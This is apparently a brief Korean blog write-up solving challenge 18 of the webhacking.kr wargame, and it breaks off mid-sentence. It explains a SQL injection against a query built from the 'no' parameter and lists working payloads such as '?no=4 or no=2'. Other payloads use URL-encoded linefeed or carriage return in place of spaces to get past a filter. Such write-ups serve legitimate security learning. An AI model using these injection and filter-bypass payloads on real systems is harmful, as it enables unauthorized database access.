webhacking.kr 18번
18번 문제 : SQL injection "select id from challenge18_table where id='guest' and no=$_GET[no]" id='guest' and no=$_GET[no] 를 거짓문으로 만들고 뒷 문장을 참으로 만들어야 한다. "select id from challenge18_table where id='guest' and no=4 or no=2 를 입력해 주어야 한다. ( id='guest' and no=4 ) or ( no=2 ) FALSE or TRUE = TRUE ?no=4 or no=2 ?no=4%0aor%0ano=2 ( linefeed ) \r?no=4%0dor%0dno=2 (Carriage return ) \n %20은 Space 인데 위의 ereg..
Web 프로그래밍/webhacking.kr
2013. 11. 13. 13:37